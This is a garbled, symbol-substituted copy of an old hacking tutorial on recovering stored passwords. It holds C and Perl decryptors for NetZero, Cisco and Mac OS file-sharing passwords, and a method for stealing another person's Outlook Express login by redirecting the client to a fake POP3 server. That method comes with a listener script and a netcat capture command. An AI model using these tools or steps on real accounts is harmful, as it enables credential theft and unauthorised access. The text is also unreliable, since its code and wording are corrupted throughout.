More Password Cracking Decrypted By Ankit FadiaMailto:ankitbol!net!in



"elco#e to anot$er edition o% Password Cracking Decrypted! &n t$is #anual we willlearn' you guessed it' $ow to crack passwords! &n t$is edition we $a(e e)planations to$ow to break #ore kinds o% passwords!

Alt$oug$ t$is #anual is *uite easy to understand' & would de%initely like to #ake onesuggestion! +o truly en,oy reading t$is #anual' you need to know C relati(ely well!-owe(er' e(en i% you $a(e no idea w$at C is' & assure you t$at t$is #anual will de%initely be o% use to you!


Cracking t$e .et/ero 0Free &P2 Dial 3p Password 

+oday' t$e nu#ber o% &nternet er(ice Pro(iders 0bot$ %ree and t$e not so %ree ones2 $as

really reac$ed a (ery $ig$ %igure! All o% t$e# ai# at pro(iding better ser(ices and #akingt$e process o% connecting to t$e &nternet easier %or t$e user! 4ne co##on practicea#ongst bot$ &nternet er(ice Pro(iders and popular browsers like &nternet 5)plorer'$a(e t$is option called 6a(e Password7' w$ic$ #akes li%e easier %or t$e user' as it allowst$e user to not type in t$e password eac$ ti#e $e $as to connect to t$e &nternet!


Alt$oug$' like all ot$er so%tware' as soon as t$e de(eloper tries to add a user %riendly%eature or #ake t$e so%tware easier to use or #ore e%%icient' $e $as to #ake at least so#eco#pro#ise in t$e security or sa%ety %ield! 4ne popular e)a#ple would be 4utlook5)press' e(er since t$e Pre(iew Pane $as been introduced wit$in t$e e#ail client'4utlook 5)press users $a(e beco#e prone to 5#ail8Borne 9iruses!


Anyway' getting back to t$e sub,ect o% t$is tutorial' e(en including t$e 6a(e Password7%eature $as #ade t$e 3ser7s Password unsa%e! .ow' w$at $appens is t$at' w$en youc$eck on t$is option or enable it' t$en t$e concerned so%tware 0Browser or &nternet

er(ice Pro(ider o%tware2 takes it passes it t$roug$ an algorit$# to encrypt it! 4nce' t$ePassword is encrypted' it is t$en stored in t$e "indows Registry or in so#e !ini or !dat ora si#ilar %ile! .ow' t$is syste# sounds *uite sa%e' $owe(er' i% you look deeper' t$en you%ind t$at it is trouble waiting to $appen!


+$e (ery %act t$at t$e encrypted password $as to be stored so#ew$ere' #akes t$is %eature(ulnerable! Also' al#ost all so%tware pro(iding t$is %eature does not use a strongalgorit$#! +$is #akes t$e work o% a $acker really easy! o#e so%tware e(en stores t$e password as plainte)t in t$e registry o' basically t$e weakest c$ain in t$is %eature ist$at #ost so%tware de(elopers are weary o% t$e %act t$at t$e encrypted password can beeasily decrypted' once we study t$e so%tware inside out! o' w$at & #ean to say is t$atusing t$is %eature alt$oug$ surely #akes li%e easy' %or t$ose o% you w$o cannot re#e#ber passwords' but it does lea(e your &nternet Account (ulnerable! -owe(er' i% you are one o% t$ose people w$o needs to write down your password on a piece o% paper and stick it to

t$e %ront o% your #onitor' t$en t$is %eature is de%initely %or you!


o $ow do & crack t$e .et/ero Dial 3p Password;


Anyway' .et/ero is a %ree &P' w$ic$ asks only %or a ad(ertising bar in return %or &nternetAccess! &t too pro(ides t$is 6a(e Password7 %eature' $owe(er' it too like #ost ser(ices'uses an e)tre#ely weak algorit$# to encrypt t$e password! +$e %ollowing process o%decryption works on .et/ero (ersion <!= and earlier and re*uires "in >)' .+ or "in ?@to be running!


For t$is e)ploit' you need to $a(e local access to t$e #ac$ine' w$ic$ $as t$e .et/eroso%tware installed!

+$is (ulnerability cannot be e)ploited unless and until you get t$e re*uired %ile' %or t$atyou eit$er $a(e to $a(e local access or need to de(ise a #et$od o% getting t$e %ile' w$ic$contains t$e password!


+$e .et/ero 3serna#e and Password are stored in an AC&& %ile na#ed' id!dat' w$ic$ islocated in t$e .et/ero directory! &% t$e user $as enabled t$e 6a(e Password7 option' t$ent$e 3serna#e and Password are also stored in t$e ,net/!prop %ile! +$e passwords stored in bot$ t$ese %iles are encrypted using a (ery si#ply easy to crack algorit$#! Alt$oug$ t$ealgorit$#s used to get t$e encrypted in%or#ation 0to be stored in t$e two %iles2' are not

sa#e' $owe(er t$ey are deri(ed %ro# t$e sa#e #ain algorit$#! Bot$ t$e algorit$#s di%%er (ery slig$tly! &n t$is #anual we will learn as to $ow t$is weak algorit$# can be e)ploited!

+$e .et/ero Password is encrypted using a substitution cip$er syste#! +$e cip$er

syste# used is a typical e)a#ple o% a 1 to 1 #apping between c$aracters w$ere eac$single plainte)t c$aracter is replaced by a single encrypted c$aracter!


Are you lost; "ell' to understand better read on!


ay' t$e .et/ero application is running' and t$e user clicks on t$e 6a(e Password7 optionand types $is password in t$e re*uired %ield! .ow' t$en w$at $appens is t$at' t$e .et/ero

Application loads t$e encrypting %ile' w$ic$ contains t$e plainte)t to cip$er8te)t databaseinto #e#ory! .ow' %or e)a#ple your password is )y/ and it is stored in location 6#7 o%t$e #e#ory and t$e corresponding encrypted password abc is stored in t$e location 6n7 o% t$e #e#ory' t$en t$e password )y/ actually is stored as abc!


"ell it is *uite si#ple' rig$t; "ell' al#ost! +$e part o% t$e encryption algorit$# used by .et/ero w$ic$ is di%%icult to understand' is t$at two encrypted c$aracters replace eac$c$aracter o% t$e plainte)t password! +$ese two encrypted c$aracters replacing a single plainte)t c$aracter' are $owe(er not stored toget$er!

"$en substituting c$aracter ) stored in i o% a password 6n7 c$aracters long' t$e %irstencrypted c$aracter would be stored in 6i7 and t$e ne)t in 6ni!7

+$e two encrypted c$aracters are deri(ed %ro# t$e %ollowing table:

  1 a M % g + > E " e G y C8888888888888888888888888888888888888g H a b c d e % g $ i , k l # n o+ p * r s t u ( w ) y / I J K% A B C D 5 F L - & @ M . 4 P R + 3 9 " N O Q S T _  = 1 ? < E U G V > : W X Y Z ;M P [ \ ] ^ ` 0 2 ' 8 !

 .4+5: P represents a single space and t$e abo(e c$art represents AC&& c$aracters!

+o encrypt a string o% lengt$ 6n7' we need to %ind eac$ c$aracter in t$e abo(e table and place t$e colu#n $eader into i and place t$e row $eader into ni!

For e)a#ple:  50a2 Y ag  50aa2 Y aagg  50a*A12 Y aaaaaag+%M  50Habcde%g$i,kl#no2 Y 1aM%g+>E"eGyCgggggggggggggggg

4n t$e ot$er $and' w$ile decrypting t$e password o% lengt$ ?n' t$en & will be beco#e t$eele#ent in t$e ele#ent in t$e abo(e table w$ere t$e colu#n is $eaded by i and t$e row$eaded by ni intersect!

For e)a#ple:

  D0a%2 Y A  D0aa%%2 Y AA  D0aaMM%g%g%g2 Y AaBbCc

Decrypting t$e password #anually would be *uite %un' but would de%initely be a (eryti#e consu#ing process! Any$ow' & do suggest you try to decrypt t$e .et/ero Password#anually atleast once! For t$ose o% you' w$o do not en,oy decrypting passwords#anually' & also $a(e a C progra#' w$ic$ will do it %or you!


+$e %ollowing C progra# de#onstrates $ow t$e .et/ero Password is decrypted! i#plyco#pile and e)ecute in t$e directory in w$ic$ t$e ,net/!prop e)ists!



\include Xstdio!$Z

\include Xstring!$Z


\de%ine 3&D_&5 GE

\de%ine PA_C&P-5R_&5 1?V

\de%ine PA_PA&._&5 GE

\de%ine B3F_&5 ?UG


const c$ar dec+ableQGSQ1GS Y I






  I` `'``'`[`'`\`'`]`'`^`'``'```'`0`'`2`'``'``'`'`'`8̀ '`!`'``J



int n/_decrypt0c$ar cCip$erPassQPA_C&P-5R_&5S'

c$ar cPlainPassQPA_PA&._&5S2


  int passen' i' id)1' id)?W

  passen Y strlen0cCip$erPass2?W


i% 0passen Z PA_PA&._&52


  print%0[5rror: Plain te)t array too s#alln[2W

  return 1W



  %or 0i Y =W i X passenW i2




  case `1`:

  id)? Y =W breakW

  case `a`:

  id)? Y 1W breakW

  case `M`:

  id)? Y ?W breakW

  case ``:

  id)? Y <W breakW

  case `%`:

  id)? Y EW breakW

  case ``:

  id)? Y UW breakW

  case `g`:

  id)? Y GW breakW

  case `+`:

  id)? Y W breakW

  case `>`:

  id)? Y VW breakW

  case `E`:

  id)? Y >W breakW

  case ``:

  id)? Y 1=W breakW

  case `"`:

  id)? Y 11W breakW

  case `e`:

  id)? Y 1?W breakW

  case `G`:

  id)? Y 1<W breakW

  case `y`:

  id)? Y 1EW breakW

  case `C`:

  id)? Y 1UW breakW


  print%0[5rror: 3nknown Cip$er +e)t inde): ^cn['cCip$erPassQiS2W

  return 1W






  case `g`:

  id)1 Y =W breakW

  case `+`:

  id)1 Y 1W breakW

  case `%`:

  id)1 Y ?W breakW

  case ``:

  id)1 Y <W breakW

  case ``:

  id)1 Y EW breakW

  case `M`:

  id)1 Y UW breakW


  print%0[5rror: 3nknown Cip$er +e)t et: ^cn['


  return 1W




cPlainPassQiS Y dec+ableQid)1SQid)?SW


  cPlainPassQiS Y =W


return =W


int #ain0(oid2


  F&5 $Para#sW

  c$ar cBu%%erQB3F_&5S' c3&DQ3&D_&5SW

  c$ar cCip$erPassQPA_C&P-5R_&5S' cPlainPassQPA_PA&._&5SW

  int done Y ?W


 print%0[ ero Password Decryptorn[2W

  print%0[Brian Carrier Qbcarrieratstake!co#Sn[2W

  print%0[take =p$t Researc$ absn[2W



i% 00$Para#s Y %open0[,net/!prop['[r[22 YY .32


  print%0[3nable to %ind ,net/!prop %ilen[2W

  return 1W


w$ile 00%gets0cBu%%er' B3F_&5' $Para#s2 Y .32 0done Z =22


  i% 0strnc#p0cBu%%er' [Pro%3&DY[' V2 YY =2


  strncpy0c3&D' cBu%%er V' 3&D_&52W

  print%0[3ser&D: ̂ s[' c3&D2W



i% 0strnc#p0cBu%%er' [Pro%P"DY[' V2 YY =2



  strncpy0cCip$erPass' cBu%%er V' PA_C&P-5R_&52W

  print%0[5ncrypted Password: ^s[' cCip$erPass2W


i% 0n/_decrypt0cCip$erPass' cPlainPass2 Y =2

  return 1W


  print%0[Plain +e)t Password: ^sn[' cPlainPass2W







i% 0done Z =2


  print%0[&n(alid ,net/!prop %ilen[2W

  return 1W

  J else I

  return =W






More .etero Fun 

Reinaldo +ru,ilo Adds:

+oday we`re going to tear apart t$e .etero logon password!+$ings you #ust keep in #ind!

1! password %or#at:='n'i8n'1?! based on t$e = counting syste#!!ie! ='1'?'<'E'U'etc<! all passwords begin wit$ a = and end wit$ a 1



U!now to get t$e second c$aracter we $a(e a special e*uation[i8nY9[ w$ere[i[ is t$e plainte)t c$aracter' [n[ is t$at c$aracters nu#erical (alue' and9 is t$e new encrypted (alue!

  a # o r e  = 1 ? < E X88t$e . (alues!0ie!. (alue %or [#[ is 12= a 1 X88encrypted password

now we go to t$e c$art and %ind [#[! Oou`ll %ind t$at #YJ but since oure*uation tells us t$at i8nY9 we get our answer like t$is! #81Yl so ourencrypted (alue %or [#[ now e*uals [[!so our encrypted password now looks like t$is

  a # o r e  = 1 ? < E X88. (alues

= a 1 X885ncrypted password

G!now we do t$e sa#e t$ing %or letter [o[!o8?Y#! [o[ now e*uals [J[

  a # o r e  = 1 ? < E X88 . (alues= a J 1 X88encrypted password

! do t$e sa#e %or [r[!r8<Yo! [r[ now e*uals [[

  a # o r e  = 1 ? < E X88. (alues= a J 1 X88encrypted password

V! an now our last (alue [e[!e8EYa! [e[ now e*uals [a[

  a # o r e  = 1 ? < E X88. (alues= a J a 1 X884ur %ull encrypted password

Result a#oreY =aJa1

& $ope t$is $as been use%ul! 5n,oy!

 .ow you can type your encrypted password into t$e password %ield o% yourdialup progra# instead o% $a(ing to use net/ero`s so%tware!

P!! one #ore t$ing!! t$e user na#e also $as a special %or#at!it goes:


e)a#ple i% your user na#e is BigDaddy you`d put t$is in t$e user %ield o%your dialup progra#


P!!! (ery i#portant!!i al#ost %orgot' say you get t$e letter [b[ as t$eUt$ letter o% your password' according to t$e c$art0abo(e2 t$ere is no #orespaces to #o(e to! so w$at you do is %ollow t$e c$art below like t$is

a a a a a b a a a a a a a a a a a a a a a X88original plainte)t= 1 ? < E U G V > 1= 11 1? 1< 1E 1U 1G 1 1V 1> ?= X88. (alues

a b c d e % g $ i , k l # n o p * r s t u X88password %or#at

so [b[ is t$e Ut$ letter! now its . (alue s$ould be e*ualto [%[ but sincet$ere is a [b[ is t$e second letter in t$e password %or#at alp$abet its .(alue gets s$i%ted back one space 0re#e#ber we`re on t$e = counting syste# bY1 not ?2! &% Ut$ letter $appened to be a [c[ its . (alue would $a(e beens$i%ted back two spaces! etc etc! +$en you would ,ust go on encrypting t$e password as nor#al!

in s$ort' you take t$e t$e original plainte)t letter`s . (alue 0U in t$iscase2 and you subract t$at letter`s . 01 in t$is case2 (alue in t$e password%or#at to get t$e new . (alue 0E in t$is case' w$ic$ would #ake t$e newletter [e[2!

-ope%ully t$is cleared up w$at i #eant' keep in #ind t$at you only re%erencet$is second c$art below w$en you get a letter in t$e original plainte)t%or#at w$o`s plainte)t . (alue is greater t$an its password %or#at . (alue


-AC@&.L +R3+-: By de%ault "indows accepts bot$ s$ort and long passwords as t$e"indows login password! o#e users use e)tre#ely s$ort passwords' w$ic$ can easily be brute %orced! o in order to set t$e #ini#u# nu#ber o% c$aracters or t$e #ini#u#lengt$ o% t$e password' si#ply %ollow t$e %ollowing registry trick8:


aunc$ t$e "indows Registry 5ditor i!e! c:windowsregedit!e)e

croll down to t$e %ollowing registry key:-@5O_4CA_MAC-&.54F+"AR5Microso%t"indowsCurrent9ersionPolicies .etwork 

Click on 5dit Z .ew D"4RD 9alue!

 .a#e t$is new D"4RD (alue as MinPwden and in t$e data %ield' enter t$e #ini#u#nu#ber o% c$aracters t$e password $as to be o%! 4ne t$ing to note $ere is t$at t$is (alue isin -e)adeci#al! .ow' Press FU and your syste# ,ust beca#e a tiny bit securer but certainly notun$ackable!


Cracking C&C4 Router Passwords Cisco Router $acking is considered to be e)tra elite and really kewl! &t is really a great

e)ercise %or your gray cells' especially i% t$e target syste# $as @erberos' a Firewall andso#e ot$er .etwork ecurity so%tware installed! Anyway' al#ost always t$e #ain #oti(e be$ind getting root on a syste# is to get t$e password %ile! 4nce you get t$e Router password %ile' t$en you need to be able to decrypt t$e encrypted passwords stored by it!"ell' in t$is section' we will learn ,ust t$at! +$e %ollowing is a C progra# w$ic$ de#onstrates $ow to decrypt a C&C4 password! _______________________________  \include\include

c$ar )latQS Y I  =)GE' =)<' =)GG' =)GE' =)<b' =)Gb' =)GG' =)G%'  =)E1' =)?c' =)?e' =)G>' =)>' =)GU' =)' =)?'  =)Gb' =)Gc' =)GE' =)Ea' =)Eb' =)EEJW c$ar pw_str1QS Y [password [Wc$ar pw_str?QS Y [enable8password [W c$ar pna#eW cdecrypt0enc_pw' dec_pw2c$ar enc_pwW

c$ar dec_pwWI  unsigned int seed' i' (al Y =W 

i%0strlen0enc_pw2 12

  return0812W seed Y 0enc_pwQ=S 8 `=`2 1= enc_pwQ1S 8 `=`W

 i% 0seed Z 1U isdigit0enc_pwQ=S2 isdigit0enc_pwQ1S22


%or 0i Y ? W i XY strlen0enc_pw2W i2 I  i%0i Y? 0i 122 I  dec_pwQi ? 8 ?S Y (al T )latQseedSW  (al Y =W

  J (al Y 1GW

 i%0isdigit0enc_pwQiS Y toupper0enc_pwQiS222 I

  (al Y enc_pwQiS 8 `=`W  continueW  J 

i%0enc_pwQiS ZY `A` enc_pwQiS XY `F`2 I  (al Y enc_pwQiS 8 `A` 1=W  continueW  J 

i%0strlen0enc_pw2 Y i2  return0812W  J 

dec_pwQi ?S Y =W 

return0=2WJ usage02I  %print%0stdout' [3sage: ^s 8p n[' pna#e2W  %print%0stdout' [ ^s n[' pna#e2W 


 #ain0argc'arg(2int argcWc$ar arg(W 

I  F&5 in Y stdin' out Y stdoutW  c$ar lineQ?USW  c$ar passwdQGUSW  unsigned int i' pw_posW 

 pna#e Y arg(Q=SW 

i%0argc Z 12  I  i%0argc Z <2 I

  usage02W  e)it012W  J 

i%0arg(Q1SQ=S YY `8`2  I  switc$0arg(Q1SQ1S2 I  case `$`:  usage02W  breakW 

case `p`:  i%0cdecrypt0arg(Q?S' passwd22 I  %print%0stderr' [5rror!n[2W  e)it012W  J  %print%0stdout' [password: ^sn[' passwd2W  breakW 

de%ault:  %print%0stderr' [^s: unknow option![' pna#e2W  J 

return0=2W  J 

i%00in Y %open0arg(Q1S' [rt[22 YY .32  e)it012W  i%0argc Z ?2  i%00out Y %open0arg(Q?S' [wt[22 YY .32

  e)it012W  J 

w$ile012 I  %or0i Y =W i X ?UGW i2 I

  i%00lineQiS Y %getc0in22 YY 54F2 I  i%0i2  breakW 

%close0in2W  %close0out2W  return0=2W  J  i%0lineQiS YY `r`2  i88W 

i%0lineQiS YY `n`2  breakW  J  pw_pos Y =W  lineQiS Y =W 

i%0strnc#p0line' pw_str1' strlen0pw_str1222  pw_pos Y strlen0pw_str12W 

i%0strnc#p0line' pw_str?' strlen0pw_str?222  pw_pos Y strlen0pw_str?2W 

i%0pw_pos2 I  %print%0stdout' [^sn[' line2W  continueW  J 

i%0cdecrypt0lineQpw_posS' passwd22 I  %print%0stderr' [5rror!n[2W  e)it012W  J  else I  i%0pw_pos YY strlen0pw_str122  %print%0out' [^s[' pw_str12W  else  %print%0out' [^s[' pw_str?2W 

%print%0out' [^sn[' passwd2W  J  J

J ______________________________ 


 .4+5: +$e abo(e works only on a inu) plat%or#! &% you are running "indows' t$enyou will $a(e to useso#e brute %orce password cracker!


Bypassing t$e Dial 3p er(er Password 

+$ose o% you w$o $a(e used File $aring' #ust certainly $a(e $eard about t$e Dial 3p

er(er so%tware or utility! .ow' t$is too can be password protected! .ow' say you $a(e password protected t$e Dial 3p er(er' and $a(e %orgotten it or so#eone $as c$anged it't$en no one can dial into your syste#! "$at do you do;


ike all password protection %eatures in "in >) syste#s' t$is too can easily be bypassedor c$anged! Oou do not need to know t$e pre(ious old password to per%or# t$is $ack!i#ply delete t$e %ile R.A!pwl %ile in t$e c:windows directory and t$e ne)t ti#e you useDial 3p er(er' you will %ind t$at it will eit$er ask you to enter a new password or si#plynot ask %or a password at all!


Cracking 4utlook 5)press7s Password 

A%ter & released t$e %irst edition o% 8 Password Cracking Decrypted Re(isited' & got a loto% #ails' %ro# people asking #e *uestions' like w$ere 4utlook 5)press stores t$e Dial3p Password and $ow to decrypt it or $ow to get t$e 4utlook 5)press password o% #y boss' w$o is on t$e sa#e A.! "ell' t$is edition will to a certain e)tend answer all suc$*uestions!


4utlook 5)press too like &nternet 5)plorer and a nu#ber o% ot$er Dial 3p o%tware' pro(ides t$e user wit$ t$e option o% 6a(e Password!7 +$is option alt$oug$ it #akesconnecting to t$e net easy' is really a stupid security loop$ole and #akes t$e password o%t$e 3ser (ulnerable to being cracked!

4utlook 5)press stores t$e Dial 3p .etworking or D3. Password in t$e registry' undert$e %ollowing key:


-@5O_C3RR5.+_35Ro%twareMicroso%t&nternet Account ManagerAccounts


"ell' actually t$e abo(e key $as a nu#ber o% sub keys' w$ic$ correspond to and storein%or#ation on (arious &nternet Connection Accounts! +$e Accounts 0in%or#ation andcon%iguration details2 are stored as =======1 %or t$e %irst account' =======< %or t$e t$irdand so on!

Clicking on any o% t$ese Accounts @ey' will display a nu#ber o% D"4RD' tring andBinary (alues in t$e rig$t pane! All t$ese (alues store con%iguration details about $owyour &nternet Connection Account works! -owe(er' t$e key wit$ w$ic$ we are reallyinterested is only t$e: P4P< Password? key!


+$e P4P< Password? is t$e D"4RD (alue' w$ic$ stores your &nternet ConnectionPassword! Actually' it is not 4utlook only' w$ic$ uses' t$is key' but t$e &nternetConnection "i/ard' under w$ic$ bot$ 4utlook and &nternet 5)plorer co#e!

Anyway' now' once & did %ind out t$e key o% 4utlook e)press' & racked #y brains to%igure out t$e algorit$# to decrypt t$e password so as to get t$e plainte)t one' butso#ew$ere along t$e way' w$en & was e)peri#enting %or anot$er o% #y tutorials' & %oundout a way w$ic$ would be #uc$ #ore easier' to get t$e 4utlook Password! &t re*uires nocoding' no %ancy C code editing and $as no Mat$e#atics o% algorit$#s in(ol(ed!

-AC@&.L +R3+-: Co##on pat$s w$ere so#e passwords are stored by (ariousapplications8:


4utlook 5)press &nternet 5)plorer 888-@5O_C3RR5.+_35Ro%twareMicroso%t&nternet Account ManagerAccounts


Panda Anti(irus: -@5O_4CA_MAC-&.54F+"AR5Panda o%twarePandaAnti(irus G!=

$ares: -@5O_4CA_MAC-&.54F+"AR5Microso%t.etDD5

creen a(er: c:windowsuser!dat

"ell' be%ore we go on to t$e actual process' let us understand w$at 4utlook usually does'w$ile connecting to your #ail ser(er and downloading your e#ail! .ow' w$en you clickon end and Recei(e' 4utlook 5)press connects to Port 11= o% your Mail ser(er and t$e%ollowing set o% P4P co##and e)c$ange takes place between your syste# and t$e P4Pdae#on o% t$e #ail ser(er:


4@ P4P 0(ersion ?!U<2 at del$i1!#tnl!net!in starting!

35R ankit

4@ Password re*uired %or ankit!

PA abc

4@ ankit $as )) #essages 0yyyyy octets2!


o' t$is #eans t$at %irstly' as soon as t$e dae#on banner' co#es up' 4utlook sends your3serna#e to t$e #ail ser(er' t$en once t$e Password re*uired Message' co#es up'4utlook sends your password! +$is in turn #eans t$at your password is being sent to t$ere#ote syste# and 0& a# sure' al#ost all o% you $a(e guessed it by now2 i% t$is re#otesyste# $as a port listener installed' t$en you can get bot$ t$e 3ser na#e and Password!

o w$at you $a(e to do is:

1!2 C$ange 4utlook 5)press7s Mail er(er setting to point to al#ost always a local#ac$ine or a #ac$ine w$ere you are able to install and run a port listener!

?!2 Connect to t$e &nternet and click on endRecei(e ,ust as you nor#ally do' and(oila' t$e listener' gets t$e password %or you! &t is as si#ple as t$at!


+$is tec$ni*ue works wit$ al#ost all e#ail clients including .etscape Messenger! &t willnot work only wit$ t$ose clients' w$ic$ ask %or a password %or you to be able to c$anget$e #ail ser(er settings!


"$ere do & get a Port istener; "ell' you can t$e# as well as all t$e -acking utility youneed %ro# eit$er www!anticode!co# or packetstor#!securi%y!co#

-owe(er' again not$ing is #ore en,oyable and satis%actory t$an to write your own Portistener! &t can easily be written in eit$er C or Perl! &n%act t$e %ollowing is a Perl script'w$ic$ acts as a port listener:



\ +$is is a si#ple tcp ser(er t$at listens on port 11=\ unless anot$er is speci%ied!\ +$e possible uses o% t$is areW\ .etscapee)plorer #ail password cac$inggrabbing\ &n netscape edit your pre%s!,s %ile so t$at your pop\ ser(er is your own ip 01?!=!=!12 t$en open netscape\ and click on get #ail t$en t$is will capture t$e user!na#e\ and password! 0ps8 dont edit your pop account in netscape\ or it will erase t$e password and pro#pt %or a new one2

\ & $a(ent got e)plorer but t$e pop ser(er can be c$anged in\ t$e registry sa#e s$ould work %or ot$er e#ail clients t$at\ allow password cac$ing!

\ Most o% t$is coding was already in t$e perleg %older \ you can %ind t$e orginal (ersion t$ere !!

 print [YYYYYYYYYYYYYYYYYYYYYYYYYYYn[W print [ Manic) local P4P< spoo%ern[W print [ www!in%owar!co!uk#anic)n[W print [YYYYYYYYYYYYYYYYYYYYYYYYYYYn[W

0]port2 Y ARL9W]port Y 11= unless ]portW \ Are port is 11= unless speci%ied

]AF_&.5+ Y ?W]4C@_+R5AM Y 1W

]sockaddr Y ` n aE )V`W

0]na#e' ]aliases' ]proto2 Y getprotobyna#e0`tcp`2Wi% 0]port K Td]2 I 0]na#e' ]aliases' ]port2 Y getser(byport0]port'`tcp`2WJ

 print [Port Y ]portn[W

]t$is Y pack0]sockaddr' ]AF_&.5+' ]port' [====[2W

select0.2W ] Y 1W select0stdout2W

socket0' ]AF_&.5+' ]4C@_+R5AM' ]proto2 die [socket: ][W bind0']t$is2 die [bind: ][Wlisten0'U2 die [connect: ][W

select02W ] Y 1W select0stdout2W

 print [istening %or connection!!!!n[W

0]addr Y accept0.'22 die ]W

 print [Accept okn[W

0]a%']port']inetaddr2 Y unpack0]sockaddr']addr2Winetaddr Y unpack0`CE`']inetaddr2W

  print . [4@ #anic) P4P< sni%%er ready!n[W

  getuserandpass02W \ call on our sub  blu%%ot$ers02W \ call on ot$er sub

\8888888888888888888888888888888888888sub blu%%ot$ersI  ]c#d Y X.ZW

8/9/2019 More Password Cracking Decrypted.doc 24/35

 .ow' say you do not want to run t$e abo(e progra# or so#e$ow do not like t$e idea o%working wit$ port listener' t$en' you can use a (ery interesting tool by =p$t!co# called .etcat! +$is tool is really (ery a#a/ing and be%ore you read t$is #anual %urt$er' & suggestyou read its docu#entation at l=p$t!co# as & will not be discussing it7s (arious interesting

options in t$is #anual!


Anyway' t$e %ollowing co##and will create a si#ple Port istener sort o% utility' w$ic$will listen to t$e speci%ied port and will record all data sent to it' in t$e log %ile speci%ied!


C:Znc l p )) Z %ile


"$ere )) is t$e port nu#ber' w$ic$ $as to be listened' and %ile is t$e pat$ o% log %ile'w$ere all keystrokes or e(eryt$ing entered by t$e person w$o connected to Port )) arerecorded!

 .ote: +$e 68l7 option listens %or connections' w$ile 68p ))7 is used to speci%y t$e port tow$ic$ you want .etcat to bind to!


 .ow' in our case' we want to bind .etcat to Port 11=' listen %or connections and record allkeystrokes' so we use t$e %ollowing co##and:


C:Znc l p 11= Z log!t)t


"ell' actually all #et$ods described in t$is #et$od to steal t$e passwords stored by t$oseso%tware w$ic$ $a(e t$e 6a(e Password7 %eature are not really needed! Al#ost all password including' "indows ogin' 4utlook 5)press' D3. and a %ew ot$ers will easilyget un#asked' by using progra#s' like: Re(elation

uc$ a progra# will basically con(ert t$e 6 7s to plainte)t! Oou can get it at: Re(elation!


Cracking t$e C&C4 &4 Password 

+$e %ollowing Perl cript' de#onstrates $ow to decrypt t$e C&C4 &4 passwords!



\usrbinperl 8w

\ ]&d: iosdecrypt!pl'( 1!1 1>>V=111 ?1:<1:1? #esrik 5)p ]


\ Credits %or orginal code and description $obbita(ian!org'

\ P-iNe' !#udge et al! and %or o$n Bas$inski X,bas$C&C4!C4MZ

\ %or Cisco &4 password encryption %acts!


\ 3se %or any #alice or illegal purposes strictly pro$ibited



)lat Y 0 =)GE' =)<' =)GG' =)GE' =)<b' =)Gb' =)GG' =)G%' =)E1'

  =)?c' =)?e' =)G>' =)>' =)GU' =)' =)?' =)Gb' =)Gc'

  =)GE' =)Ea' =)Eb' =)EE' =)EV' =)U< ' =)UU' =)E? 2W


w$ile 0XZ2 I

  i% 00password#dU2ss0Qda8%S2io2 I

  i% 00lengt$0]?2 122 I

  ]ep Y ]?W ]dp Y [[W

  0]s' ]e2 Y 0]? YK T0!!20!2o2W

  %or 0]i Y =W ]i X lengt$0]e2W ]iY?2 I

  ]dp !Y sprint% [^c['$e)0substr0]e']i'?22T])latQ]sSW









Cracking t$e Mac4 Password 

+$e %ollowing piece o% code de#onstrates t$e working o% t$e algorit$# used by Mac4to encrypt password and also $ow to decrypt suc$ passwords! o 5n,oy



 "ritten by .ate Pierce



 uly 1E' 1>>>


Algorit$# taken %ro#:

 & $a(e tested t$is on V!G and it works %ine as well!


Co#piled *uite peac$ily on linu) ?!?!1= wit$:

 g 8o #ac%spwd #ac%spwd!c


Run e)a#ple 0wit$ debug on2:


Quserser(er userS] !#ac%spwd ===E=G1V=D=A1>=B

 4riginal string: == =E =G 1V =d =a 1> =b

1st N4R string: == == =E =G 1V =d =a 1>

?nd N4R string: < = G< G E = ? Gb

Password is: stayaway


88888 %ro# t$e url abo(e 88888

 +$e encryption algorit$# in Mac4 syste# is si#ple and t$e password can be easily



Password is stored in 3sers Lroups Data File in Pre%erences %older! 4%%set is di%%erenton

 eac$ syste# and depends on 3sers Lroups con%iguration' but it always lie a%terowner`s

 userna#e! &t`s not so di%%icult to %ind it using a $e) editor' e(en i% we don`t know owner`s


-ere are so#e e)a#ples o% encrypted passwords:

 == =E =G 1V =D =A 1> =B Y stayaway

 =A 1F 1= 1B == = U 15 Y yellow

 1C 1B 1G 1E 1? G? 1= B Y owner 

 = =? 1< 1A 15 =F 1A 1E Y turnpage

 ? ?U << ? ? <> ?E 5 Y +rustno1


AA BB CC DD 55 FF LL -- Y aa bb cc dd ee %% gg $$



 AA BB CC DD 55 FF LL -- 8 encrypted password 0$e)2

 aa bb cc dd ee %% gg $$ 8 decrypted password in AC&& codes 0$e)2


aaYAA N4R <-

 bbYBB N4R AA N4R =-

 ccYCC N4R BB N4R G<-

 ddYDD N4R CC N4R G-

 eeY55 N4R DD N4R E-

 %%YFF N4R 55 N4R =-

 ggYLL N4R FF N4R ?-

 $$Y-- N4R LL N4R GB-


 An e)a#ple:

 et`s take 44 =E =G 1V =D =A 1> =B


==- N4R <- Y <- Y s

 =E- N4R ==- Y =E-W =E- N4R =- Y E- Y t

 =G- N4R =E- Y =?-W 4?- N4R G<- Y G1- Y a

 1V- N4R =G- Y 15-W 15- N4R G- Y >- Y y

 =D- N4R 1V- Y 1U-W 1U- N4R E- Y G1- Y a

 =A- N4R =D- Y =-W =- N4R =- Y - Y w

 1>- N4R =A- Y 1<-W 1<- N4R ?- Y G1- Y a

 =B- N4R 1>- Y 1?-W 1?- N4R GB- Y >- Y y


tested on:

 Mac4 !U!<' !U!U' V!1' V!U!

copied (erbati# %ro# a post to bugtra* by Dawid adi) Ada#skiXadi))FR&@4E!4.5+!PZ on

 uly 1=' 1>>>

 88888 snip 88888





co##ent t$is out i% don`t want to see t$e e)tra in%o

\de%ine D5B3L


& t$ink t$e #a) password lengt$ %or %ile s$aring is V c$aracters

\de%ine P"5. V


int $e)dig0c$ar *2W

returns deci#al e*ui( i% * is =8>' a8%' or A8F


int $e)int0c$ar p'c$ar *2W

returns (alue o% ? digits spliced toget$er 8 $e)int01U'1U2 will return ?UU


int #ain0int argc' c$ar arg(QS2I

  int s1Q1=S's?Q1=S's<Q1=S'iW

  c$ar pwdQP"5.1SW


%irst string 8 try ===E=G1V=D=A1>=B




  coutXX[n5rror: last argu#ent s$ould be a 1G digit $e) nu#ber 0no spaces please2n[W

  return 1W





c$unk in ?nd N4R string 8 based on t$e string %ro# t$e %ile






c$unk in %inal N4R string 8 t$is is constant










\i%de% D5B3L

  coutXX[4riginal string: [W



  coutXX$e)XXs1QiSXX[ [W


  coutXX[n1st N4R string: [W

  coutXX[== [W



  coutXX$e)XXs?Qi1SXX[ [W


